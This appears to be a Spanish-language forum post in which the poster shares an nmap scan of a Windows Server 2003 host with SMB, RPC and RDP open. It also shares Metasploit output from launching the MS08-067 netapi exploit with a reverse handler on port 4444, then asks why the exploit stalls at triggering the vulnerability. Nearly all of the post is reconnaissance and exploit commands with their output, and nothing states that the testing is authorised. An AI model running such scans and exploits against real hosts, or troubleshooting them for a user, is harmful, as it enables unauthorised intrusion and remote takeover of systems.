nmap -sS -sV -O 172.19.45.0
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-11-12 06:47 EST
Nmap scan report for pgajpl (172.19.45.0)
Host is up (0.0010s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
2701/tcp open cmrcservice Microsoft Configuration Manager Remote Control service (CmRcService.exe)
3389/tcp open ms-wbt-server Microsoft Terminal Service
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
Network Distance: 4 hops
Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_server_2003
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds
Y este es el resultado del exploit:
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on 172.19.45.77:4444
- Automatically detecting the target...
- Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
- We could not detect the language pack, defaulting to English
- Selected Target: Windows 2003 SP2 English (NX)
- Attempting to trigger the vulnerability...
Si alguien me pudiera orientar acerca de que pueda estar pasando si es que el exploit esta desactualzado o algo se los agradeceria gracias antemano colegas.